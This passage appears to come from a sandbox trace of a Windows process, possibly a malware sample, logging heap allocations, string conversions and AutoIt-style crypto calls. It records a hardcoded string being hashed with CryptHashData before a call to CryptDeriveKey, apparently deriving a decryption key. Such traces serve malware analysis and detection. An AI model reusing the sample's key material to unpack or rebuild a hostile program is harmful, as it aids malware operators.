lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0120.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0120.205] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b18 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0120.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2bd8 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2c08 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2788 [0120.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2c08 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0120.206] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0120.206] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0120.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0120.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43ca7c0 [0120.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca7c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0120.209] CryptHashData (hHash=0x41ac600, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea268 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0120.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0120.210] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0120.211] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0120.211] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0120.211] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0120.211] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0120.211] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.212] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0120.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0120.213] RtlAllocateHeap 